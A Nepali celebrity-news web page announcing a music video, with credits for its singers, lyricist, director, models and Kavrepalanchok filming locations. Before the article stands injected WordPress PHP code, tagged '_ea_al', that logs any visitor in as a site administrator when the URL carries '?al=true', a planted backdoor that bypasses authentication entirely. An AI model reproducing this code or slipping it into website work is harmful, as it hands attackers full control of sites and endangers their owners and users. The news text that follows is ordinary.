// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); सिम सिमे पानी छ आकाशमा बादल छ (भिडियो) | Celebrity Nepal

सिम सिमे पानी छ आकाशमा बादल छ (भिडियो)


सेलिब्रेटी नेपाल काठमाडौँ
Barsha-siwakoti
सिम सिमे पानि छ आकाशमा बादल छ..बोलको भिडियो सार्बजनिक भएको छ । गायक उदेश श्रेष्ठ,राजीब संग्रौला र मौसमी गुरुङको स्वरमा रहेको गीतमा
शब्द तथा संगीत राजीब संग्रौलाको रहेको छ । उदेश श्रेष्ठले संगीत संयोजन गरेको गीतमा लोक पप लाइ फ्युजन गरेर डान्सिङ्ग फेभरमा बनाउन खोजिएको छ । जेनिस म्युजिकले सार्बजनिक गरेको उक्त भिडियो लाइ बिभोर पोखरेलले निर्देशन गरेका हुन् भने रोशन श्रेष्ठले छायांकन र टेकेन्द्र शाहले सम्पादन गरेका छन् । मोडल वर्षा किरण र सन्दीपको अभिनय रहेको भिडियो लाइ काभ्रेपलान्चोकका रमणीय स्थान हरुमा छायांकन गरिएको छ ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.